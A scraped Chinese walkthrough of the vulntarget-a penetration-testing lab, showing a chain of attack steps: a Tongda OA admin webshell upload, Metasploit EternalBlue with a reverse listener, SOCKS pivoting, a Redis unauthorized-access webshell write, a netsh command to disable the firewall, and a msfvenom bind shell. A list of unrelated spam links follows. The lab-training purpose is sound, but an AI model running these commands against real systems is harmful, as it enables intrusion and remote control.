当前位置: 首页 > news >正文

域渗透靶场-vulntarget-a综合靶场

nmap发现开放80端口
image
浏览器访问,是通达oa
image
可以搜索poc或者使用oa利用工具拿到shell
通过账号admin 密码滞空,进入后台
image
我们这里使用通达OA 11.2 后台getshell

点击系统管理 -> 系统参数设置 -> OA服务设置 找到Webroot目录
image

点击系统管理 -> 附件管理 -> 添加存储目录
image

点击组织 -> 系统管理员 -> 上传附件
上传txt文件,抓包修改一句话木马,蚁剑或者哥斯拉连接
image
路径以及文件地址已给出,自行拼接,蚁剑getshell
image
信息收集,发现第二张网卡:
image
可以先让这台机器上线msf,建立路由,进行对20网段的渗透

use exploit/windows/smb/ms17_010_eternalblue
set rhost 192.168.135.152
set lhost 192.168.135.128
set lport 4444
run
image
添加一下路由
image
开启一下代理,可以进行内网渗透了
use auxiliary/server/socks_proxy
set srvhost 127.0.0.1
run
image
利用auxiliary/server/socks_proxy模块开启socks代理

use auxiliary/server/socks_proxy
set version 4a
run
image

redis未授权访问,写入webshell
proxychains4 redis-cli -h 10.0.20.99
config set dir 'C:/phpStudy/PHPTutorial/WWW/'
config set dbfilename shell.php
set 1 ""
save
image
哥斯拉连接
proxychains4 java -jar godzilla.jar
image
关闭win2016防火墙,上传msf生成的bind_shell
netsh advfirewall set allprofiles state off #关闭防火墙

msfvenom生成shell

msfvenom -p windows/x64/meterpreter/bind_tcp rhost=10.0.20.99 lport=4444 -f exe -o shell.exe
image
上传到哥斯拉,并执行
image

http://www.sczhlp.com/news/131753/

相关文章:

  • tp5.1做的网站wordpress 又拍云
  • 2014网站推广方案网页设计实训报告摘要
  • 无锡网站的优化哪家好旅游网站设计的建设原则
  • yes风淘宝网站wordpress插件安装本地安装教程
  • 网站建设项目模板wordpress摘要 省略号
  • 电商网站毕业设计论文网站设计师培训图片
  • 做一年的网站维护价格如何做照片ppt模板下载网站
  • 微信怎么做网站推广网络广告销售
  • 网站建设和网页设计的区别做小程序还是做网站
  • 京东客网站怎么建设上海网站建设兴策
  • 建网站公司哪个比较好高级搜索
  • 数组和链表读取、插入、删除以及查找的区别
  • 一个人可做几次网站备案广告平面设计要学多久
  • 网站如何添加数据仙游网站建设公司
  • 中文网站的seo怎么做上海开办企业一窗通网上服务平台
  • 建网站网站信专业广州网站建设
  • 代做外国空间网站网站做哪家最专业广州
  • day 09 课程
  • 在K8S中,日志分析工具有哪些可以与K8S集群通讯?
  • 在K8S中,网络通信模式有哪些?
  • 商城网站管理系统工业设计公司如何运营
  • 做个简单网站大概多少钱温州seo代理
  • 浙江火电建设有限公司网站seo是什么工作
  • 做网站哪家网站好建设公司网址
  • 珠海网站建设优化有哪些网站可以接单做效果图
  • 辽宁人工智能建站系统软件网站建设ppt答辩
  • 南昌专门做网站的人企业公示信息查询系统吉林
  • 做网站怎么备份数据大气金融php网站源码
  • 网站建设方案书设计图网站制作文案杭州
  • 一文教你搞定PASS 2025:样本量计算神器安装到使用全流程